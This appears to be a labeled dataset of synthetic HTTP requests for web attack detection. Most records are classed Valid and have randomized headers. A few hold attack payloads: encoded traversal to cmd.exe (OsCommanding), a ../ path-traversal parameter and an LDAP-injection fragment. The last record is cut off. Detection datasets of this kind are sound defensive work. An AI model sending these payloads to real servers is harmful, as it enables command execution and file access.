GET /ptlets8sett0lnzAecm/i.ja8WAS_-uXSFb/rbpK/rJFEooJEo3/wc@HRveKG9oC8hpvI2zt/rJlBehkd-c@2O_Rza.html?6rhyn0hNbiIe2=a&exUNFobjecty=s%5C%3Edeechoess%26%40iiNda%3Edlocation8&en1oeeltptn=ti&2dt=%3A+%3CA&htuOilebs5oSpr0=46078645&rttpelniegiurre=t7a87Drefl&Eiha9a=tewt7aT HTTP/1.0
Host: www.Xwve.be:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rest-Eaga, hhdnxt-g;q=0.7
Cache-Control: no-cache
Client-ip: 219.182.236.19
Cookie: og5=eYo
Cookie2: $Version="940"
Date: Thu, 20 Oct 05 12:44:47 CET
ETag: W/".m3CZgLSzXAn1PocvZF7"
Expect: 100-continue
From: Oimrip@itut.fr
If-Modified-Since: Tue, 03 Jul 07 18:46:21 UTC
If-Unmodified-Since: Mon, 09 Jan 06 16:46:38 CET
If-Match: "gagQDGSqmkrlwnxJNdh1"
If-None-Match: "@DCC8JyZLXna2Ei"
If-Range: Mon, 09 Feb 09 03:10:06 GMT
Max-Forwards: 9
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM aHQzbnNvZTNyamVjZWRhYXRzRnRhZ2hscDRwNXEzaDZrYWFuaml1MXI=
Authorization: CoOn nceeedH=inqotuA
Range: 415535-51
Referer: http://www.j2h4ilH.org/5rle/zaulit/vStOnr/lnruiinl/b9dsewsv.png
TE: trailers
Trailer: Date
User-Agent: yeeeL (xZWpTpF; tq10k2xXIa; bwdXaP)
UA-CPU: Sparc
UA-Disp: 618,722,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 124x705
Via: 5.9 www.ebiyqlon.jpg, 7.7 www.vdir.gif
Transfer-Encoding: he9a; ni4iis=Hman5ao
Upgrade: iel/9.0, oheP2O/3.1, Iic66t/8.1
Warning: 203 www.rshjafcw.gif:00 "oocSb7oh" 
X-Forwarded-For: 40.189.230.161
X-Serial-Number: 109708230731
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10992
Start - Id: 7905
class: Valid
PUT /c5niutdneaasnmofon/Sz3xWJhttps2YN-/u7Gtpwun3Jh3m0wFrnSD/Qp_s4I3jEcorM1O/snwo9erm4uhRvsioem.jsp? HTTP/1.0
Content-Length: 189
Content-Language: ic
Content-Encoding: gzip
Content-Location: /8rDricu/twrn/e4tw5do/dt8thtn/7denht.wav
Content-MD5: eXNnaUh5c3R0aGNhZW50YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 21 May 08 18:26:08 CET
Last-Modified: Sat, 19 Jan 08 11:20:33 GMT
Host: 121.69.47.115:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-15, iso-8859-8-i;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 80.30.219.68
Cookie: edlomi=eautoexec5n;eOittoZdjnan4=;mcnetinclude'metaeaccess_logm0;lhcr=owzyQ7;rt=cAfhsoLf
Cookie2: $Version="762"
Date: Mon, 17 Nov 08 03:35:59 CET
ETag: "16u5merbbmBxGJzc4"
Expect: 100-continue
From: l4eni@eruttntIgw.be
If-Modified-Since: Wed, 08 Sep 04 08:49:46 GMT
If-Unmodified-Since: Sun, 04 Jul 04 03:02:13 CET
If-Match: "jSk@9DTwwtfSVtIsW4eh"
If-None-Match: *
If-Range: *
Max-Forwards: 424
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: NTLM MmJ1c2VQc29jYTQzQmFtTW1mQTNwc2l0bmF0bnRta2V1ZVJuZFN6ZWl3Zmhi
Authorization: Digest nonce
Range: 53-7,1-,223-
Referer: http://www.6aaop3i.fr/laaySt2/Ta3tr/tLgeaRLd.png
TE: trailers,trailers
Trailer: If-Match
User-Agent: nI9s0a8b/8.4.3
UA-CPU: StrongARM
UA-Disp: 9422,2675,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0867x578
Via: 1.5 168.15.236.4:3178
Transfer-Encoding: hdsu; st8uehR=eucRd
Upgrade: ostuwl/1.1
Warning: 506 www.rkgan.shtml "foasisheiEmi1anrehl" "Wed, 29 Sep 04 24:11:01 GMT"
X-Forwarded-For: 179.151.107.237
X-Serial-Number: 534170749
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ao5sse4lekSc=gB1_V&lrtiamaifac=rslips8te)&nO=9&dE7ereeoatrmMwr=sjqaEgrnhkeUer9ra&2sQt=eT8qHb&gEeeme=694&who36=35137276&herfe=ydYtdrvvdosd&1eeoUea=ifngcbwcoit)l&aa4iooo=nkApimn4Bb9nlueEe

End - Id: 7905
Start - Id: 9158
class: Valid
GET /heem76iittd/-PrZ/ttdzeecispwtmearame/m_OsTQ/F@xterme7joQn2/krc1jvjgw-zy4/ntuiizEdyhey0cuipt4e.jpeg?on5K..-OQ0Y=0&puljOtso=emn%5D&Oi=s8e%5CwaYts HTTP/1.0
Host: www.ane4e.org:81828
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: sx-a, dlf2cm-EhRfb;q=0.2
Cache-Control: only-if-cached
Client-ip: 67.89.1.105
Cookie: _VUyZQopenXv@f=sr2ptrizie9a;nr8SUX8_img=76579;nlyfapayeejY=493;ao9onasduap= $bqh
Cookie2: $Version="96"
Date: Fri, 12 Mar 10 02:42:43 GMT
ETag: W/"-fmhV-@Ije5xJ9oFP"
Expect: Tialu
From: fwtTde@tnn0ld58.biz
If-Modified-Since: Thu, 06 May 10 24:35:33 GMT
If-Unmodified-Since: Mon, 25 Oct 04 18:30:14 UTC
If-Match: "YHpGvS-v5pcVJNzX"
If-None-Match: *
If-Range: *
Max-Forwards: 8714
MIME-Version: 9.1
Pragma: es='o7ei'
Proxy-Authorization: ktOzu w5Tane=sisl
Authorization: NTLM aHBydHRyZHVlZ2UybzdoZXVhb2FvYnY2c3EzZkdkYWJpeG9udnV1Z2lvOWVldWE=
Range: -7586
Referer: http://www.feoifnEy.cz/sgssddc/S9of6nfv.mdb
TE: trailers
Trailer: Date
User-Agent: a1ahfmss/9.5.0.9.9
UA-CPU: MIPS
UA-Disp: 104,519,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 0794x264
Via: FTP/8.3 188.6.5.104, FTP/4.1 www.sFh3o.gif
Transfer-Encoding: gzip
Upgrade: mapEt/8.1, RNae/5.1
Warning: 159 www.0AEorhcn.jpeg "6asniYhhhgonscr" "Sun, 16 Apr 06 01:50:22 CET"
X-Forwarded-For: 189.85.16.83
X-Serial-Number: 3795859892
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9158
Start - Id: 44380
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 8.202.225.114
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: euc-kr;q=0.1, euc-jp, iso-10646-ucs-2;q=0.9, utf-8;q=0.3, iso-8859-3;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 90.164.80.82
Cookie: n1rilgdleu9enf=aa;EunionS.4bZkRg8=f unionOa6 pAstnen;dAtjo=t3NCJ.bp;rteimw=rar;lgTciliye=0335;botooedsr=a
Cookie2: $Version="962"
Date: Tue, 31 Jul 07 08:47:53 CET
ETag: "hRtyES0J8kvkJHkX"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Mon, 23 Jun 08 11:44:47 UTC
If-Unmodified-Since: Wed, 10 May 06 04:09:41 CET
If-Match: "T4zlc4FMAAGr3y8"
If-None-Match: *
If-Range: Thu, 11 Oct 07 11:16:51 UTC
Max-Forwards: 95
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: Basic YlJoZWlnOjN6aW5lR2I=
Range: -592489
Referer: /grmsnrrL/roceeria/eireyseh.pdf
TE: trailers,chunked;q=0.5
Trailer: Proxy-Authorization
User-Agent: enTXPn http://www.fziOOris.st
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 347x4806
Via: FTP/7.8 221.252.209.249, 1.7 www.ien9hpl.html:6316, 0.0 236.202.122.185:03
Transfer-Encoding: deflate
Upgrade: HeiarI/6.4, enio/6.7, DHqogf/0.4
Warning: 551 92.44.38.235:34239 "tifgnertsiaoesxw" 
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 16212196997401300
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44380
Start - Id: 7693
class: Valid
PUT /oef-p0Vz/8KxWEnTAKbGRfjLcMqIs/xfTToZSCv/r6_Ny4gI3uR__T/ce/l2eTRQ.QXfTPWU/coe4r/ccopaeon/Aisq/pw1pseDh0IE.shtml? HTTP/1.1
Content-Length: 8
Content-Language: ufpitlab,i
Content-Encoding: identity
Content-Location: http://www.n9asisk.com/miifaana/tdhCy/j7lectn/ddhn/Sn8ut.php
Content-MD5: ZXJuaWdqOHNkbk9yZG1idQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 02 Aug 09 02:58:49 GMT
Last-Modified: Tue, 22 May 07 13:29:30 GMT
Host: 45.191.54.17:384
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: us-ascii, x-mac-japanese
Accept-Encoding: identity;q=0.1
Accept-Language: nnFdtvwm-nIToPtrl
Cache-Control: iarasdmn='tx'
Client-ip: 64.120.128.79
Cookie: IF4AJTk9V=1048;ys=f updateaahb;unrvDysfeteIu0=o ~leinEplaTe
Cookie2: $Version="64"
Date: Tue, 24 Jun 08 13:45:10 UTC
ETag: W/"DLjJ9AmUWMxaRSuEx8l"
Expect: toEr=iczdqPs;syir
From: hniei7@Uuezhotro.it
If-Modified-Since: Thu, 31 Aug 06 16:35:18 UTC
If-Unmodified-Since: Fri, 28 Jan 05 12:11:21 UTC
If-Match: "VTcj90c6NkIvMZZd"
If-None-Match: *
If-Range: *
Max-Forwards: 005
MIME-Version: 3.0
Pragma: agdlt='n5'
Proxy-Authorization: Basic cGllYWc6eHBvbmw=
Authorization: Basic c2JlaWo5bHo6b2V4U2R0NFM=
Range: 62-,-281
Referer: http://www.eoemhgne.gov/0oWys8i8/owrcdt.wmn
TE: deflate;q=0.8
Trailer: Via
User-Agent: d9yNoa http://www.snIhUoE.gov
UA-CPU: Sparc
UA-Disp: 609,771,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 105x515
Via: s5u/3.1 www.aaw7e.png
Transfer-Encoding: compress
Upgrade: hOeos/1.6
Warning: 199 www.oi0qe4a.jpg "lraikclebtlEioaNy3" 
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 5287621951731
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

amsi=599

End - Id: 7693
Start - Id: 8858
class: Valid
GET /iliqn98K55hs4rew7c/hrtetsnteyw.swf?44a5nr=7zwnirslhndepm&Oh=brijdnr&oeoko1oom6=et-sc%3Adu&a3lxekefcsrx=n.j&GF_z@8tZ=e9uRLIg6aEh&gxK=rMs6ar3dbNV2fme&N7ex=r%3Co6eehtaccesadmin2n%25l HTTP/1.0
Host: 3.226.154.16:942
Connection: keep-alive
Accept: image/*, application/*, audio/basic
Accept-Charset: gb2312, cp-932, iso-10646-ucs-2;q=0.1, iso-8859-8-i
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-age=91
Client-ip: 73.159.234.63
Cookie: ceaebtr0=418
Cookie2: $Version="67"
Date: Tue, 07 Oct 08 03:46:36 CET
ETag: W/"pXSCo35tRrXsat."
Expect: 100-continue
From: nnsIg@cmoeufg.uk
If-Modified-Since: Sat, 10 Nov 07 14:29:37 CET
If-Unmodified-Since: Fri, 21 Dec 07 10:36:56 CET
If-Match: *
If-None-Match: *
If-Range: "yrh.4q0812bsXRB"
Max-Forwards: 284
MIME-Version: 1.5
Pragma: af='wt'
Proxy-Authorization: Digest cnonce="locenctt"
Authorization: Digest realm
Range: 7-
Referer: /2qinfn8/aTd1g.asmx
TE: deflate;q=0.8
Trailer: If-Modified-Since
User-Agent: Mozilla/9.0 (Machintosh; U; PPC 0.3; po-ai; rv:6.0.2) Gecko/36721588
UA-CPU: Sparc
UA-Disp: 909,1237,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 345x783
Via: HTTP/1.5 232.185.70.26
Transfer-Encoding: deflate
Upgrade: it9o/7.8, e4esfs/7.3, Csos/8.4
Warning: 091 www.bqal5R.jpg "tAj9t" 
X-Forwarded-For: 160.159.126.87
X-Serial-Number: 56388963279118
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8858
Start - Id: 28217
class: Valid
GET /8all52/HdG/2ioIoridsqvjkf/gK0500NBs0LUfB/gIERn2L9tCP8ouB.png?u3=222389&tf=nph-qodaife%40uls%5D&hnoefDzeucrteho=a%7Eam3log2urny&nnlo=585&rrmoisomdlsla=n-74+Oio&naas=085972 HTTP/1.0
Host: www.Ehasp.ch:4
Connection: aseaSmrg
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=82745
Client-ip: 178.43.207.106
Cookie: pn=53925578;eh0Rjp=a0tosystemaips %ehrll[sl
Cookie2: $Version="33"
Date: Fri, 13 Aug 04 13:58:21 CET
ETag: W/"tUeMAPyQI6ihZL-AIy"
Expect: 100-continue
From: ldbonaa@rtlruedpi.uk
If-Modified-Since: Tue, 18 May 04 14:34:27 GMT
If-Unmodified-Since: Tue, 20 Jan 04 14:49:38 UTC
If-Match: *
If-None-Match: ".wkVh-3WNh9bodPG1-O"
If-Range: Fri, 02 May 08 21:45:38 CET
Max-Forwards: 5
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="lesgG"
Authorization: NTLM dHNsZWFuaXBydHptZWExc2FhSW5ybm9laGdlZWRydHpvdGJzYXd0bzFhYWhk
Range: -569,-376,5-
Referer: /e4to/maae.aspx
TE: trailers,trailers
Trailer: TE
User-Agent: dfd6cyjv http://www.coija.com
UA-CPU: MIPS
UA-Disp: 7874,6904,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3395x113
Via: 5.1 www.amuhrea.js:580
Transfer-Encoding: identity
Upgrade: Tsis/9.8
Warning: 776 108.16.131.195 "ielaue4Iaenoncleslf" "Mon, 18 Feb 08 07:26:55 CET"
X-Forwarded-For: 242.176.161.203
X-Serial-Number: 1882318101295
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28217
Start - Id: 26530
class: Valid
GET /5A6Xv5wrxPumV/rwndttnziniu/9viBTj.png?seuretaysno=otaU%7Enwneo HTTP/1.0
Host: www.ahwltuet.net:80
Connection: keep-alive
Accept: */*
Accept-Charset: cp-950;q=0.5, iso-8859-8-i, x-mac-japanese
Accept-Encoding: 
Accept-Language: etil-daltOn9;q=0.2, fFo-e, 76ne-ldemT
Cache-Control: no-transform
Client-ip: 134.90.132.179
Cookie: ri3utieoonqo0=152747
Cookie2: $Version="52"
Date: Tue, 31 Oct 06 05:56:29 UTC
ETag: "wkR70Hd1M5uZ-nw"
Expect: tta7=ndhftly
From: IitaesA@fwzeietc.uk
If-Modified-Since: Mon, 04 Dec 06 07:53:32 GMT
If-Unmodified-Since: Thu, 08 Mar 07 08:16:53 GMT
If-Match: *
If-None-Match: "0QAjtdqca6CHlUykV"
If-Range: "xCRpjhMQi-UzYhlgtnr2"
Max-Forwards: 074
MIME-Version: 2.6
Pragma: netituAa='vethyEis'
Proxy-Authorization: CrcHl 7otge=ez2Tr
Authorization: NTLM cnRlbGk4YXJkaHNnTW5jRmE3c29vd3Q4dG44YWRlblRlZ1VvbzdvZWhlZzk4ZQ==
Range: -51243,13953-
Referer: http://nwuehdg.be/ameT/lrdrigeD/Ixeae/enP0.asmx
TE: trailers,gzip,chunked;q=0.2
Trailer: Range
User-Agent: an4o/4.2
UA-CPU: MIPS
UA-Disp: 7109,7775,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 987x6257
Via: 8.9 www.anStsnn.html, ga9Kce/9.5 www.laemhe.shtml, FTP/9.9 157.215.49.190
Transfer-Encoding: identity
Upgrade: V7o/0.6, ntERl/2.5, ecTzst/9.3
Warning: 503 www.rEangso.jpeg "tesd4si" "Wed, 14 May 08 12:40:15 GMT"
X-Forwarded-For: 240.213.194.27
X-Serial-Number: 693373977262
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26530
Start - Id: 30598
class: Valid
GET /oeqEYarrQnn/bsy9ndii.exe?style9n3j2YMe=1218607&oeebisTdnhn=ucatsenull1trhte&mide3stn7a=407729&mrehatxc=glb&efdfrGic3=erCpXlN&o9@Oc=etmp%24Rw&teatfjrehneh=3csfne9e4n&mw=5416061893 HTTP/1.1
Host: www.saeAawkDaT.be
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-2022-jp, macintosh, x-mac-roman;q=0.9, iso-8859-5, windows-1255;q=0.6
Accept-Encoding: 
Accept-Language: Es-6oheeMj;q=0.2, ogatalz6-ns4waaoe;q=0.2, ftiise4t-jttT, hTjDnae-75KsIH;q=0.9
Cache-Control: only-if-cached
Client-ip: 219.201.94.198
Cookie: En=T%thaYa0alsfjtvn3syae;etZd5ea=0520031;eesr=0a?cyr1r;wruuhcNac=qysayv
Cookie2: $Version="613"
Date: Fri, 20 Apr 07 05:51:46 GMT
ETag: "gg1X-8UhAWyIZ5KCUz_-"
Expect: 100-continue
From: t5tsTx@a6D80vsnt.org
If-Modified-Since: Thu, 14 Sep 06 22:59:54 GMT
If-Unmodified-Since: Mon, 01 Sep 08 24:47:22 GMT
If-Match: "T0r@cIwj-oZZVxVN4"
If-None-Match: "FdtRvBZnfXh-tcSJ"
If-Range: Tue, 20 Oct 09 10:27:54 GMT
Max-Forwards: 0
MIME-Version: 1.6
Pragma: ehih='aI'
Proxy-Authorization: dlri frtoat=ifoee5n
Authorization: hRee oDmh2cnf=pgl8cs
Range: -07588
Referer: http://www.Qrtplgo6.net/cnsd3tty/nReiB/7ehfci.msf
TE: deflate;q=0.6,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.4 (X11; U; Solaris 7.8; vn-sb; rv:8.8.3) Gecko/69304188
UA-CPU: 68000
UA-Disp: 436,0901,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 689x0740
Via: FTP/6.0 www.Getta5Os.png, 9.7 132.38.199.191:47431, 1.3 www.puem.jpg
Transfer-Encoding: deflate
Upgrade: sdiomm/2.1, Wsg/0.8, imNsy/1.7, jse/5.1, nhs/6.4
Warning: 981 www.tChen.tiff "enpV8eeRsnbvnineberf" 
X-Forwarded-For: 113.222.226.64
X-Serial-Number: 79914989141850023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30598
Start - Id: 22867
class: Valid
GET /iL-0HtgK/7y8ne3/eztii/rtu/cvxcBvncQdy20b5/ej6guoNsdAH@tJ/ioFnesch/hkD5dT35/nw-xmNIT@A/eV-0HHte_xXoFU1_/aE/psitntaiTNtszepsre.cgi?meodxStehd=zlng HTTP/1.1
Host: www.o4sDw6t.st:80
Connection: close
Accept: text/plain;q=0.5, application/*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: min-fresh=680
Client-ip: 76.193.28.123
Cookie: ra87t=r0Zs3ar0tteimo;c6eoe=86;SorbinVk-2km500=uIP@85El8a;Eape=87998706;Xcopy.VGxr=ers9oo
Cookie2: $Version="80"
Date: Wed, 16 Feb 05 04:33:22 UTC
ETag: W/"6nKcYtlxwrlR7G10i6h"
Expect: Mtuuy=aen9t
From: tooo@iHal.net
If-Modified-Since: Sat, 07 Aug 04 09:50:24 GMT
If-Unmodified-Since: Sat, 24 Jul 04 04:54:48 GMT
If-Match: "7vrntGB7A4Z.izg"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest realm
Range: -78,325-,-890033
Referer: /erpo.pdf
TE: deflate;q=0.2,trailers
Trailer: Accept
User-Agent: Mozilla/7.1 (X11; U; Solaris 9.9; nn-t5; rv:1.7.8) Gecko/01732128
UA-CPU: StrongARM
UA-Disp: 533,0632,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 134x6878
Via: 4.2 www.isoe9di.html, 3.8 223.210.228.164
Transfer-Encoding: lq4Lpw
Upgrade: 6ahich/9.0, ixit/2.6
Warning: 232 www.h6evDis.html "glsDCiammtshlegnnam" "Wed, 04 Oct 06 22:00:11 CET"
X-Forwarded-For: 68.104.33.155
X-Serial-Number: 8712140
----: -------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 22867
Start - Id: 44743
class: PathTransversal
GET /oQUO52/ExuqdHbdyLgE/N0zbhp5memae2tl7l/DE8divKP0dkt/uneO.html?dSh9e=49712274&tehqe=81&ELhuwiuFifcccm=.%2F..%2F..%2F..%2F..%2F..%2F&iesMew4hesma=yve1flk&hiK5u2M@@Ao=98920&QgXpWAHosamfJ=13 HTTP/1.1
Host: 242.162.143.237
Connection: iser
Accept: */*
Accept-Charset: windows-1257;q=0.0
Accept-Encoding: gzip;q=0.9, identity;q=0.4, deflate;q=0.5
Accept-Language: 3ryTu-e;q=0.6, msl-4k, t-fa;q=0.9, 8rsy-oe9;q=0.0
Cache-Control: no-cache
Client-ip: 239.84.56.120
Cookie: yswjvo=gZgi7;wclYsnyeeyqreo=i1rtn
Cookie2: $Version="5"
Date: Wed, 04 Jan 06 20:21:46 GMT
ETag: "pRYdV20JSOUG4g2by2Bw"
Expect: ebctde=i5tn
From: p3teud@syl6D.biz
If-Modified-Since: Fri, 29 Jul 05 22:39:46 UTC
If-Unmodified-Since: Mon, 05 Apr 10 10:58:20 GMT
If-Match: *
If-None-Match: "S-F81SlC_ZZIHC9Pnp"
If-Range: Mon, 29 Sep 08 18:52:22 UTC
Max-Forwards: 2
MIME-Version: 4.7
Pragma: thhhehno=suTi6wo
Authorization: NTLM aG5TbzRqY1Z0ZXM1aWVzZm56bk1hYXB0SWlpbm8ydW9lYnRvZDhlMGQ=
Range: 218-,38304-
Referer: http://www.m8Anwo3n.ch/g4lna2g/bieot5/EsnltW/rgiPopef/rtmu.exe
TE: gzip,trailers,deflate;q=0.6
Trailer: TE
User-Agent: Mozilla/7.6 (Machintosh; U; PPC 5.7; 5a-ee; rv:0.6.5) Gecko/80892057
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 7624x8326
Via: Ieukni/7.3 www.Iksh.jpg, FTP/8.6 www.go795Ci.gif, HTTP/7.2 69.246.49.53
Transfer-Encoding: gzip
Upgrade: y9uo/8.1, 6tTo/8.6, sd1ve/9.7, OmipFw/5.0, Xew/1.5
Warning: 438 www.rsk9th.shtml "do9iaoemswqhy" 
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 7113830026427564096
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44743
Start - Id: 30216
class: Valid
GET /cj/t2iRLD25LvOI8N7/fupbnAtluise7alrqth/tAad/xbekrat8eel/7oall7vbCng/o1d/cy4bqii1Octltu0soIh/bST3EEerxM@Kc0W/5nrhgct0irkiee/m-UcuRd/-yJuObodyF92IO@.asmx?gudhse2Sva=5904219&52ufmiotsev7sf=ajEqe&ttrovfatc=sfs+aHsc&sw=tm&oiaei=85767&mbtQu7from=lMVQDI&iurq=405&es=655461&ee9ogedqw1=hri5rm6i HTTP/1.0
Host: 91.67.112.9:270
Connection: wsseiZ2A
Accept: application/x-tar
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 15.120.71.38
Cookie: eu72tii8Nacuo=s@npbeMT.A7;6ettUt8EmtO=eghs;sn=arn2teahumaE60me8r;b7kegigmhacL=u;fsihqeibhjdlekm=lEou
Cookie2: $Version="709"
Date: Mon, 14 May 07 01:52:24 GMT
ETag: W/"GmsUi8tlrlwJp5@w"
Expect: 100-continue
From: ud3orBc@aher6.cz
If-Modified-Since: Fri, 18 Apr 08 06:56:45 CET
If-Unmodified-Since: Tue, 11 Dec 07 01:00:22 UTC
If-Match: *
If-None-Match: *
If-Range: "qpArCk6AWiMMAnE@j_"
Max-Forwards: 3
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM c2VkbnlhdWV1b21hdzF5YmlzbGZyeXZlaWVhOWlmVHdseGxlb216Mzk=
Range: 346642-698,469-394,8-
Referer: /cs3a/lpidlon/aebba9.mdb
TE: trailers
Trailer: Authorization
User-Agent: p7V1UcO http://www.mqkdl.uk
UA-CPU: PowerPC
UA-Disp: 058,5611,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8300x7095
Via: 4.1 www.OThTdt.js
Transfer-Encoding: Ai64ad; OHa1=mmijeoT
Upgrade: eftf/4.4, ddnAte/3.1
Warning: 579 185.81.167.241 "3i0d" "Wed, 17 Jan 07 24:46:17 CET"
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 19194011026
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30216
Start - Id: 37722
class: LdapInjection
PUT /ehnse9Iaj9bI/vypsfCQJIPm4Wservices9/oh/boGu/pR.asp? HTTP/1.0
Content-Length: 274
Content-Language: dGl4ty,dxzOpms6
Content-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Host: www.eflimoflg7.de
Connection: 2eeheIRa
Accept: */*
Accept-Charset: iso-8859-9, windows-1258
Accept-Encoding: *;q=0.1
Cache-Control: no-transform
Cookie2: $Version="851"
Expect: 8mpesG7
If-Modified-Since: Wed, 08 Dec 04 01:45:10 UTC
If-None-Match: "eS7uwhXzfnEMKQxMV8m"
Referer: /9le5z/mlce/spio.php
User-Agent: Mozilla/3.8 (X11; U; Unix 5.2; nn-re; rv:5.6.1) Gecko/46914695
Via: FTP/5.1 137.160.212.178, FTP/2.2 www.a6taei3d.jpg
----: --------------------------------------------------

tiioeicc0oulet=ue@ktbf&mSihh=g@m&ojtoNoq5sp=r3Antnilsrkn&VrUWqhNDAU=u&fe0Oo=a|f[bgsoundta6group byEr&nxEmsio=7262&mrleypF=8886883&rntas=3606478&xErb4rtonD89=ae&0earloedf=IstyleduioGe4nhome ho&rv8ly=itrst&rldanaljry=)    (  |  (be=o1Daw*)&zstPAtpeorSaex=7

End - Id: 37722
Start - Id: 21478
class: Valid
GET /5rGb@.BeIKQo/DHlbodyChobjectU-/rstmeNltnhtadipimro/ew/0lWQ4_STCBa/yRchildB4n9gk/pltHndkfpcaoCne/nwD6f-hLA2/Asdyapiaoiur0/LKT@VpVEgA1TJI1.sh?b2pG2fDUWdropXy=sBLM&ttroGIx=5erokodon9eeaosamRdsh&D.7zatqdropp0=9&-Bc8TV=hpnA&qmtta1f=6764&si=yCMvsVeF2GkU&i2lea=lWpoh&1wijh1ygy=Tm0eerhyet HTTP/1.1
Host: www.ipso.org
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: bmaoet-aeue2ead;q=0.0, pte-2rd9lox, nnwd-rtD, e-ook0ogc, idt-hah;q=0.3
Cache-Control: no-cache
Client-ip: 89.181.176.125
Cookie: M@Vrdyb=698;ohDdcgfRo=8;ayattpeau=r odw encbTey;ovctofDl=g.nVU
Cookie2: $Version="99"
Date: Tue, 28 Dec 04 02:19:57 CET
ETag: W/"SP92jKSMi0F97Ui36wfH"
Expect: 100-continue
From: eesn@eeanDbi.org
If-Modified-Since: Wed, 06 Feb 08 05:03:12 GMT
If-Unmodified-Since: Wed, 19 Jan 05 15:44:06 UTC
If-Match: "8sTiFKSi8O@fNTHULw"
If-None-Match: "ROr38U72kwNasHw"
If-Range: "68XWo@kpNxDwSgaa"
Max-Forwards: 4
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM ZUFlc2hncG5tZjZvMHNkcnRkdHNkWGluMWVrZWlkdHlzc2VuYg==
Authorization: tewn ostiosAs=rau1bnt
Range: -90,-13698,843877-
Referer: /t9sieswe.mpg
TE: deflate,trailers,deflate
Trailer: Connection
User-Agent: gy89do (r6wSgCex9_; eRl6dN; dqBBxo; ed@IGn; d.iImHH)
UA-CPU: Sparc
UA-Disp: 738,354,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7753x3387
Via: 2.9 www.iocnxs.png
Transfer-Encoding: compress
Upgrade: Hnpe3d/2.9, aor/1.2, Unn8/1.9, tgr5/3.9
Warning: 550 www.i2iee6oc.shtml "oSacwy8tbotbo3s3Oheu" 
X-Forwarded-For: 58.196.148.222
X-Serial-Number: 53165421880572
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 21478
Start - Id: 43997
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: www.t8rrat.fr
Connection: keep-alive
Accept: application/postscript;q=0.5
Accept-Charset: big5;q=0.8, koi8;q=0.5, euc-jp, iso-8859-7
Accept-Encoding: gzip;q=0.2, compress;q=0.7
